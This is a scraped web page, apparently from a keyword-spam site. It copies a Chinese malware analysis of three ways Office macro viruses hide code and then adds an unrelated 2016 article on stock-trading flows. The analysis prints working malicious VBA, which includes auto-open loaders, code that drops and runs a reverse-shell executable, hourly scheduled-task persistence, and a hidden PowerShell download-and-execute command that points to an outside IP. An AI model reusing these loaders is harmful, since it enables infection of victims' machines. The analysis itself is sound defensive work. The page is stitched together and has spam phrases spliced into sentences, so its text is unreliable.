English
联系我们
网站地图
邮箱
旧版回顾



aiios抢红包插件有哪种

技术揭秘:宏病毒代码三大隐身术

作为一类古老的病毒,宏病毒随着勒索软件的兴起而卷土重来。尤其是在2016年,以Locky为代表的勒索软件利用Office宏肆虐传播,宏病毒也成为目前最活跃的病毒品种之一。

在与安全软件的对抗中,宏病毒使用了多种手段隐藏其恶意代码或数据,近期出现的新变种则是利用Excel表格的函数动态生成PE文件数据、设置远距离存放位置、隐藏显示、不同表切换等方式进行隐藏。接下来,360QEX引擎团队将对宏病毒代码流行的三类“隐身术”进行逐一揭秘。

0x01 Excel表格隐藏数据

样本文件md5: 48f202f903741e7a1722bfa6b4c051aa.xls

sha256: 083a05000c4b8e9a88a0ff8a95a3d9826dd389b440bb1781237ca124b0d986a7

virustotal 扫描结果:

样本对自身 VBAProject 进行了加密,

破解之后,看到了宏代码执行入口函数 Auto_Open,

Sub Auto_Open()

On Error Resume Next

Application.DisplayAlerts = False

Dim WB As Workbook

Set WB = ActiveWorkbook

Dim Sh1, Sh2, sh3 As Worksheet

Set Sh1 = WB.Sheets(1)

Set Sh2 = WB.Sheets(2)

Set sh3 = WB.Sheets(3)

Dim str As String

str = Sh2.Cells(996, 40)

Dim t As Date

t = Now + TimeSerial(0, 0, 1)

Application.OnTime t, str

End Sub

病毒作者使用 Application.OnTime 函数,间隔 1 秒,执行 字符串 “str” ,”str” 的值是从表格 Cells(996, 40) 中获取,当去查看表格中该处值时发现病毒更改了Excel单元格格式

,把数据隐藏显示。

单元格格式设置为三个 ;;; 时,单元格内容就会被隐藏。

单元格的格式默认是显示的,初始设置为,

去掉隐藏后,查看表格中该值是 Fnslr12 , 即病毒的功能入口函数名称,函数代码为,

Sub Fnslr12()

On Error Resume Next

Application.DisplayAlerts = False

Call Build

Sheets(1).Select

Dim WB As Workbook

Set WB = ActiveWorkbook

Dim Sh1, Sh2, sh3 As Worksheet

Set Sh1 = WB.Sheets(1)

Set Sh2 = WB.Sheets(2)

If Cells(2, 1) "" Then

GoTo skyhigh

End If

''' 以下省略

因此,该函数为病毒代码的主功能函数。

此函数的功能有,

1、

Call Build

调用Build 函数, Build 函数功能为:在表格中动态生成,待写入 可执行文件(pe文件)所需的数据,其功能代码简略如下,

Sub Build()

Sheets(2).Select

Set WB = ActiveWorkbook

Set Sh1 = WB.Sheets(1)

Set Sh2 = WB.Sheets(2)

'bob location

i = Sh2.Cells(1000, 12)

j = Sh2.Cells(1000, 13)

'index table location

R = Sh2.Cells(1000, 10)

C = Sh2.Cells(1000, 11)

Counter = R

Do While Sh2.Cells(Counter, C) ""

If Sh2.Cells(Counter, C + 1) "" Then

S1 = Sh2.Cells(Counter, C)

S2 = Sh2.Cells(Counter, C + 1)

End If

Counter = Counter + 1

Loop

Cells(i, j).Select

Range(Selection, Selection.End(xlDown)).Select

Selection.Cut

Range("i1001").Select

ActiveSheet.Paste

Cells(1, 1).Select

End Sub

函数运行结果为,在 1001 行往下,依次每行填入数据。

2、对是否运行过一次做检查,

If Cells(2, 1) "" Then

GoTo skyhigh

End If

当运行过一次之后, Cells(2,1) 表格会被写入值,会在这里进入语句 Then ,执行 “Goto skyhigh” 语句, “skyhigh” 标记定位在函数尾部,即执行该语句后会退出该函数。

3、从代码意图猜测,病毒作者想在 %userprofile% \AppData\Roaming\Microsoft\Templates 生成一个名为Macro1.vbs 的vbs文件 ,

Dim Fnslr1 As String

Dim Fnslr2 As String

Fnslr2 = Environ(Sh2.Cells(998, 40)) & "\AppData\Roaming\Microsoft\Templates\Macro1.vbs"

ChDrive (Fnslr2)

If Dir(Fnslr2) = "" Then

Else

End If

其中,病毒拼凑生成文件的目录路径时,从表格 2 的Cells(998, 40) 中读取 ,该值为环境变量值 userprofile.

只是,病毒作者并没有继续完善相关代码。实际测试运行样本也并没有生成该文件,猜测可能作者后续加入该功能,或者该功能已经被取消。

4、在 %serprofile% \AppData\Roaming\Microsoft\Templates 目录生成可执行文件 Macro1.exe,

Dim i As Double

i = 1000

Fnslr1 = "Macro1.exe"

Fnslr2 = Environ(Sh2.Cells(998, 40)) & "\AppData\Roaming\Microsoft\Templates"

Fnslr3 = FreeFile()

Open Fnslr1 For Binary As Fnslr3

Do While Sh2.Cells(i, 9) ""

Fnslr11 = Sh2.Cells(i, 9)

If (Fnslr9 = True) Then

Fnslr8 = 1

Do While (Fnslr8

Fnslr6 = Sh2.Cells(997, 40) & Mid(Fnslr11, Fnslr8, 3)

Put #Fnslr3, , Fnslr6

Fnslr8 = Fnslr8 + 3

Loop

End If

If Fnslr9 = False Then

Fnslr9 = True

End If

i = i + 1

Loop

Close #Fnslr3

Dim Fnslr10 As String

Fnslr10 = Fnslr1

Fnslr7 = Shell(Fnslr10, vbHide)

写入Macro1.exe 所需的数据,从 Excel 表格中 Cells(997, 40) 周围读取,实际测试数据开始位置是 1001行,

代码尾部使用 Shell 函数,启动生成的 Macro1.exe 。

文件信息

可执行文件是 x64位的,功能是,启动 powershell 附带 –enc 参数,执行一段 shellcode ,这段 shellcode是一个 reverse shell ,连接黑客服务器,等待下达命令。

此部分与下面创建计划任务不间断运行的功能呼应起来,此部分不是本文重点,不再详述。

5、在 %serprofile% \AppData\Roaming\Microsoft\Templates 目录生成 bat (cmd) 批处理脚本文件 Macro1.bat,

Fnslr2 = Environ(Sh2.Cells(998, 40)) & "\AppData\Roaming\Microsoft\Templates"

Dim User As String

User = Environ(Sh2.Cells(998, 40))

Fname = Fnslr2 & "\Macro1.bat"

FNum = FreeFile

Open Fname For Output Access Write As #FNum

WholeLine = "SchTasks /Create /SC HOURLY /TN " & Sh2.Cells(1000, 3) & "Macro1" & Sh2.Cells(1000, 3) & " /TR" & " " & User & "\AppData\Roaming\Microsoft\Templates" & "\Macro1.exe /ST 01:00"

Print #FNum, WholeLine

Close #FNum

Dim TempFileName As String

TempFileName = Fnslr2 & "\Macro1.bat"

Shell TempFileName, vbHide

尾部使用 Shell 函数 启动该脚本,结果是在用户机器创建了一个计划任务, 每隔一小时运行一次 上面生成的 Macro1.exe 。

6、弹窗显示输入密码才能继续进行运行,

pword = InputBox("Please enter a password to proceed", "Password Required", "*******")

Select Case pword

Case Is = ""

MsgBox "Try Again"

Case "Alon2016"

RP = 1

Case Is "Alon2016"

MsgBox "Try Again"

End Select

从病毒代码中知道,要求输入的密码是 “Alon2016” 。

7、接下来是现场清理和掩饰,删除调用Build 函数在表格生成的数据,在表格的开头显着位置填入在其他表格中保存的邮件收件人地址信息,

小结:该样本的特别之处有,1、PE文件数据是使用函数动态生成,2、数据存放在Excel表格中,使用隐藏显示,3、数据存放位置很远,不容易被看到,4、病毒在不同的excel表中切换,给分析人员调试VBA代码增加困难,5,病毒运行完毕,清理现场,显示邮件地址列表,掩饰自身。

0x02 VBA User Form隐藏代码

此类病毒把部分代码隐藏到 VBA 工程中的 用户控件(User Form)中,甚至把带有代码的控件最小化,使之不易被看到。

样本文件md5:9266db6c7772f6c45411ff3a591b1374

sha256 : 9d11f2d2f0e0e5fd8a2ef552a5521920767d7939881443435296d0c600e4a71a

virustotal 扫描结果:

查看该文件的宏,

此文件看起来像是正常的SQL操作类的宏代码,但是当我们查看窗体 Ultra 时发现,

有个控件的Caption中存放了可疑数据如下,

D!icrobrioft.XD!LHTTP10)Adodb.britr00aD!10)brih00ll.Application10)Wbricript.brih00ll10)Proc00bribri10)G00T10)T00D!P10)Typ0010)op00n10)writ0010)r00briponbri00Body10)briav00tofil0010)\hendib00.00x00

此数据在宏代码中被使用的位置为,

CadenaCurrency(Ultra.CommandButton3.Caption, "00", "e")

其中,CadenaCurrency 是一个简单的 Replace 调用,

Public Function CadenaCurrency(A1 As String, A2 As String, A3 As String) As String

CadenaCurrency = Replace(A1, A2, A3)

End Function

解密方法是,

Dim aproblems As String

aproblems = CadenaCurrency(Ultra.CommandButton3.Caption, "00", "e")

aproblems = CadenaCurrency(aproblems, "D!", "M")

aproblems = CadenaCurrency(aproblems, "bri", "s")

constans_problems = Split(aproblems, "10)")

解密为,

Microsoft.XMLHTTP

Adodb.stream

shell.Application

Wscript.shell

Process

GeT

Temp

Type

open

write

responseBody

savetofile

\hendibe.exe

几个字符串呈现出非常明显的意图,下载(Microsoft.XMLHTTP)+ 写文件(Adodb.stream)+ 执行(shell.Application / Wscript.shell)。

此样本因为代码有问题,没能成功运行起来。找到宏代码中使用 Microsoft.XMLHTTP 对象下载文件的位置,加上断点调试,起先因为作者疏忽,忘记书写一个双引号,导致编译失败,

之后,运行到下载文件处时,出现了报错。

0x03文档内建属性隐藏代码

此类病毒把代码核心恶意部分放入文档的内建属性中。

样本文件md5:0ce81eda6b6886163cf5dadffecc0df9

sha256: 23d07a51f7a14a95a1efc55ad3f18cd5a71607156cd325256d43f0b68cfb62cd

virustotal 扫描结果:

此样本的vba 宏代码只有1个文件,很简短,

Attribute VB_Name = "NewMacros"

Sub Auto_Open()

Call winshell

End Sub

Sub AutoOpen()

Call winshell

End Sub

Function winshell() As Object

On Error Resume Next

Err.Clear

Dim ps As String

ps = ActiveDocument.BuiltInDocumentProperties("Manager").Value

Dim Obj As Object

Set Obj = CreateObject("WScript.Shell")

Obj.Run ps, 0

Application.DisplayAlerts = False

End Function

响应两个文档打开事件,AutoOpen 与Auto_Open,直接执行 winshell函数, winshell函数读取文件内建属性,Manager 的值,直接执行起来。Manager值,我们使用右键文件属性,查看为,

powershell.exe -nop -w hidden -c $b=new-object net.webclient;$b.proxy=[Net.WebRequest]::GetSystemWebProxy();$b.Proxy.Credentials=[Net.CredentialCache]::DefaultCredentials;IEX $b.downloadstring();

是一段 Powershell 执行的脚本代码,从指定 URL (http://37.28.154.204:8081/ygklKbyIVG51Kol) 下载文件。目前测试此URL已经无法访问。

0x04 总结

以加密勒索为代表的病毒,越来越多的使用Office宏,js,vbs等非Pe文件来传播。通过脚本代码动态向Windows 目录中释放可执行文件或者从服务器下载可执行文件。

非PE病毒查杀引擎QEX是 360安全产品中负责查杀宏病毒及vbs、js、html等脚本病毒的独有引擎。上述样本QEX引擎均已查杀。

在这里也提醒 Microsoft Office 文档系列软件的使用用户,

1、如日常无使用宏的需求,请禁用 Office 宏

1 ru ri chang wu shi yong hong de xu qiu, qing jin yong Office hong

2、对于经常使用宏工作的用户,请安装安全软件,定期更新病毒库,对于他人发送的文档,在打开之前请先扫描。

当前文章:http://www.chetztogom.com/a2t9vs2gu/58496-58663-51055.html

发布时间:00:04:08


{相关文章}

有色股再成热饽饽 9股获过亿大单抢筹

市场环境转暖为有色金属板块在春季大反弹形成强有力的支撑,同时在供给侧改革持续发酵、大宗商品价格持续反弹等多重利好推动下,有色股再次成为热饽饽。据E投资金融量化终端监控到的数据,主力近两周内合计净买入有色股13.02亿元,其中,中金岭南(000060,股吧)(000060)、铜陵有色(000630,股吧)(000630)、锌业股份(000751,股吧)(000751)等9只个股更是受到主力阿里巴巴在ios抢红包插件方面_星玄未来ios抢红包插件平台亿元以上巨单的抢筹。

一、九只个股ios抢红包插件及量子计算_星玄未来ios抢红包插件平台遭遇亿元大买单

表一、近两周席位累计买入净额前十大有色股

股票代码 股票名称 总买入净额(万) 机构买入净额(万) 游资买入净额(万)

000060 中金岭南28369.02 7267.11 21101.91

000630 铜陵有色 21556.28 0 21556.28

000751 锌业股份 17804.49 -3350 21154.49

000657 中钨高新(000657,股吧)17182.07 0 17182.07

600988 赤峰黄金(600988,股吧)16556.2 20326.33 -3770.13

002716 金贵银业(002716,股吧)15741.18 15877.34 -136.16

000426 兴业矿业(000426,股吧)15580.51 0 15580.51

000960 锡业股份(000960,股吧)14673.19 3164.37 11508.82

002378 章源钨业(002378,股吧)12513.34 -316.8 12830.14

000975 银泰资源(000975,股吧)4823.9 6954.91 -2131.01

数据来源:E投资金融量化终端;数据统计区间:2016年3月31日至4月14日

供给侧改革持续发酵,大宗商品价格持续反弹等多重利好推动有色金属板块近期反复活跃。E投资金融量化终端监控到,近段时间主力资金也现身有色金属个股的炒作。

据数据统计,近两周共有14家有色金属个股吸引机构和游资的注意,其中机构净买入6家标的,游资净买入8家。操作金额方面,机构共计净买入4.33亿元,游资累计净买入8.69亿元,两支主力共计净买入13.02亿元,不难看出多方动能占据绝对的优势。其中表一的前九只个股的净买入超亿元。

中金岭南(000060)、铜陵有色(000630)等最受主力资金追捧,累计获买入净额均超2亿元。主力集中在4月13日操作中金岭南。申万宏源(000166,股吧)证券上海闵行区东川路营业部与机构抢筹力度相当强劲,买入净额达9528万元和9433万元,广发证券(000776,股吧)西安南广济街营业部、安信证券南昌胜利路营业部等也为多方主力,扫货净额均在5000万元以上,前五大买方席位共计接盘净额约占该股当日总成交额的25.49%。做空主力以机构为主,四家机构及中信建投哈尔滨新阳路营业部合计净卖出8299万元,约为多方主力的五分之一,主力较为惜售。铜陵有色也是在13日获得主力的关注,参与资金以游资为主,中信证券(600030,股吧)上海淮海中路营业部、长城证券武汉关山大道营业部等领衔吸筹,买入净额达1.06亿元、0.76亿元。而东吴证券(60装配式建筑和ios抢红包插件_星玄未来ios抢红包插件平台1555,股吧)太仓上海东路营业部、安信证券梅州五华营业部等带头抛售,卖出净额为0.26亿元、0.15亿元,多方力量同样远胜空方。

二、游资涌跃 百多家席位在混战

表二、近两周累计买入有色股净额前十大营业部

交易席位 交易次数 买入净额(万) 买入金额(万) 卖出金额(万)

中信证券上海淮海中路营业部 2 14725.87 14847.85 -121.98

申万宏源证券上海闵行区东川路营业部 2 12446.41 12471.43 -25.02

方正证券(601901,股吧)台州解放路营业部 1 10326.64 10498.72 -172.08

广发证券西安南广济街营业部 3 10054.9 10859.25 -804.35

安信证券南昌胜利路营业部 2 9346.19 9387.97 -41.79

方正证券杭州延安路营业部 2 8749 8813.37 -64.38

华泰证券(601688,股吧)上海威宁路营业部 2 8610.34 9385.95 -775.6

长城证券武汉关山大道营业部 1 7632.9 7634.39 -1.49

光大证券(601788,股吧)佛山季华六路营业部 1 7349.17 7405.2 -56.03

国泰君安上海福山路营业部 3 6953.92 8432.81 -1478.88

数据来源:E投资金融量化终端;数据统计区间:2016年3月31日至4月14日

通过E投资金融量化终端数据来看,近两周共出现153家游资席位“染指”有色金属个股的交易,多空营业部几乎参半。交易金额方面,买入金额为26.28亿元,卖出金额为17.54亿元,游资主力共计净买入8.74亿元。游资多空双方操作热度高涨,多方力量领先。

上海地区游资以及方正证券旗下游资在有色金属个股抢筹方面最为积极。中信证券上海淮海中路营业部一马当先,近两周共计净买入1.47亿元有色金属个股,做多力度位居榜首。统计数据显示,该席位大部分筹码压在铜陵有色(000630),另外也踊跃入驻兴业矿业(000426)。申万宏源证券上海闵行区东川路营业部尾随其后,操作重心集中在中金岭南(000060)和金贵银业(002716),吸筹净额分别为9528万元和2918万元。华泰证券上海威宁路营业部、国泰君安上海福山路营业部等游资也跻身做多行列前十名,涉猎中钨高新(000657)、赤峰黄金(600988)、锌业股份(000751)等标的。方正证券系游资台州解放路营业部和杭州延安路营业部吸筹力度位列第三和第六,扫货净额为1.03亿元和0.87亿元,两家主力均重点关注锌业股份(000751)。

业内人士认为,市场环境转暖为有色金属板块在春季大反弹形成强有力的支撑。从去年四季度至今,有色金属大幅回调后逐渐企稳反弹,从上市公司年报、一季度,以及交易所公开信息来看,机构投资者在股价走低同时悄然加仓有色金属板块。

三、异动个股

爱施德(002416,股吧)(002416) 游资先下手 机构下巨单

表三、近两周买入爱施德净额前十大席位

交易席位 占盘比 买入净额(万) 买入金额(万) 卖出金额(万)

机构专用 0.47% 10349.57 10349.57 0

机构专用 0.32% 6913.11 6913.11 0

申万宏源证券温州车站大道营业部 0.23% 4820.79 5003.06 -182.27

机构专用 0.21% 4494 4494 0

银河证券宜昌新世纪(002280,股吧)营业部 0.18% 3798.36 3800.7 -2.34

国信证券(002736,股吧)上海北京东路营业部 0.17% 3524.76 3830.39 -305.63

浙商证券宁波四明中路营业部 0.16% 3406.49 3422.98 -16.5

广发证券汕头珠ios抢红包插件可视化图表_星玄未来ios抢红包插件平台池路营业部 0.15% 3214.01 3268.78 -54.78

海通证券(600837,股吧)北京中关村(000931,股吧)南大街营业部 0.13% 2831.64 4494.9 -1663.26

财通证券绍兴人民中路营业部 0.11% 2349.55 4453.29 -2103.74

数据来源:E投资金融量化终端;数据统计区间:2016年4月1日至4月14日

虚拟现实概念股爱施德近期受到机构和游资两支主力的共同抢筹,E投资金融量化终端检测到的数据显示,爱施德近两周内受主力买入5.3亿元,卖出1.31亿元,净买入3.98亿元,为近两周内主力净买入金额最大的个股。

数据显示,爱施德于4月5日和4月11日登陆龙虎榜。在4月5日,当日多方部队由财通证券绍兴人民中路营业部、深圳阿里巴巴ios抢红包插件实验室_星玄未来ios抢红包插件平台广发证券汕头珠池路营业部、国信证券上海北京东路营业部、银河证券宜昌新世纪营业部、申万宏源证券温州车站大道营业部等五个营业部组成,上述营业部分别净买入2349.55万元、3214.01万元、3524.76万元、3798.36万元、4820.79万元,合计净买入1.77亿元。而当日前五卖席组成的空方卖出净额仅为3414.72万元。

4月11日,多方加大火力猛攻,并且机构亦携巨单加入多方队列。当日的多方攻击队由三家机构和浙商证券宁波四明中路营业部、海通证券北京中关村南大街营业部组成,分别净买入1.04亿元、6913.11万元、4494万元、3406.49万元、2831.64万元,合计净买入2.8亿元。当日空方卖出净额也极小,只有2774.1万元。

从以上数据看,爱施德不断得到主力的加码抢筹,其股价在近5日拉升21.54%。实际上,自今年1月14日以来,其股价便不断攀升,截止昨日收于24.83元,早于超越其股灾前夕的最高峰22.92元。近期爱施德布局虚拟现实领域的动作不断,计划推出万家虚拟现实体验店。

四、活跃营业部揭秘(一百一十八)

兴业证券(601377,股吧)武汉公正路营业部 专找热点龙头下手

表四、近两兴业证券武汉公正路营业部买入净额前十大个股

股票代码 股票名称 买入净额(万) 买入金额(万) 卖出金额(万)

000657 中钨高新 6763.88 6763.88 0

002396 星网锐捷(002396,股吧)6405.38 6407.44 2.06

300028 金亚科技(300028,股吧)4405.81 4418.01 12.21

300141 和顺电气(300141,股吧)4244.61 4244.61 0

002174 游族网络(002174,股吧)2981.78 2981.78 0

300176 鸿特精密(300176,股吧)2525.13 2525.13 0

300134 大富科技(300134,股吧)2376.2 2376.2 0

300496 中科创达(300496,股吧)1403.97 1408.09 4.12

002761 多喜爱 1333.47 1333.47 0

000567 海德股份(000567,股吧)1282.06 1282.06 0

数据来源:E投资金融量化终端;数据统计区间:2016年3月31日至4月14日

本周所介绍的兴业证券武汉公正路营业部近两周共参与了14只个股的交易,具体看,该营业部对这14只个股均是净买入,合计净买入3.76亿元。而从其攻击的标的看,虚拟现实、有色、特斯拉等热门题材较受其青睐。

有色股是该营业部抢筹力度最大的个股,4月1日,该营业部出手买入中钨高新(000657),买入净额为6763.88万元。当日中钨高新斩获封涨停。此外,当日华泰证券的上海威宁路营业部和上海武定路营业部也积极抢筹该股,两营业部合计买入8998.31万元。今年来,为什么ios抢红包插件那么重要_星玄未来ios抢红包插件平台中钨高新先后宣布重大事项,一是宣布获注中国五矿旗下资产成为全产业链钨业平台,为此筹划重大资产重组事项;二是拟定增募资不超50亿元投硬质合金深加工项目,进行产业链延伸。

虚拟现实概念也是该营业部最为青睐的题材,该营业部在4月8日至15日期间入手星网锐捷(002396)、金亚科技(300028)、中科创达(300496)三只概念股,买入净额分别为6405.38万元、4405.81万元、1403.97万元。虚拟现实近期可谓是红得发紫,利好消息不断,资金炒作热情持续高涨。

此外,特斯拉概念股鸿特精密(300176)、大富科技(300134),充电桩概念股和顺电气(300141),网络游戏概念股游族网络(002174)也都获得该营业部的买入,买入净额分别为2525.13万元、2376.2万元、4244.61万元、2981.78万元。

《投资快报》发自广州

专题推荐

相关新闻


? 1996 - 星玄未来ios抢红包插件平台 版权所有?? 联系我们

地址:北京市三里河路52号 邮编:100864